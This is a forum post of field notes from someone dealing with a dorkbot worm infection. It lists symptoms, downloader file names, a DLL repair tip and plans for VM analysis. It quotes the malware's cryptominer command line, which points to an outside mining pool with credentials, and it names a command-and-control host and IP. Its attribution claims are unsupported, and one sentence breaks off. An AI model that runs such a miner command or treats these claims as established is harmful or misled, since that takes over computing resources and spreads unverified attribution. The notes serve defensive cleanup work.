Not a question, more notes and tips / observations on win32\dorkbot!lnk. We have a few sites with this, it is a botnet worm that propogates over drives, then creates downloaders that contain the payloads. The payloads do not show up as viruses and have names like 3.exe, 20.exe, 1CB.exe and increment on reboot.
Command line for TCP IP is: miner.exe -a 60 -g yes -o http://xxxvideos.sso9523.com:8332/
-u p0rnstar_worker -p ornelia
Signs you have this are:
*Cannot perform automatic updates
*MS Security Essentials run time protection is off & command line calls to it fail also
*HDD folders disappear and are replaced with links (Clicking these links invokes the virus, the actual folders are hidden
* Screen flashes once when removeable drive is connected (files copied to drive etc)
* IERTUTIL.dll is often missing and makes it impossible to boot up OS. A copy of this can be found in c:\windows\system32\dllcache
Copy this to the system32 dir
Downloader files are created in VBA language and stored in %appdata%. File names are 3.exe, 4.exe and increment on each bootup. The programmers are from China and the downloader exe connects to xvm-170-142.ghst.net and is resolved to an IP 18.104.22.168 hosted in Paris. Because the virus creates
The programs are written in China and the hosted connection they connect to are hosted in Paris.
3.exe and its friends do not show as risks in AV software. Only the original BOTs show up as risks.
To date re-imaging has been the only safe way to repair.
Does anyone have any notes on handling this? I believe there is a function on shutdown that recreates the exes (downloader files)
Any notes, appreciated if you add them here. I have copies of the downloaders and will run them in VM and grab the handle and window names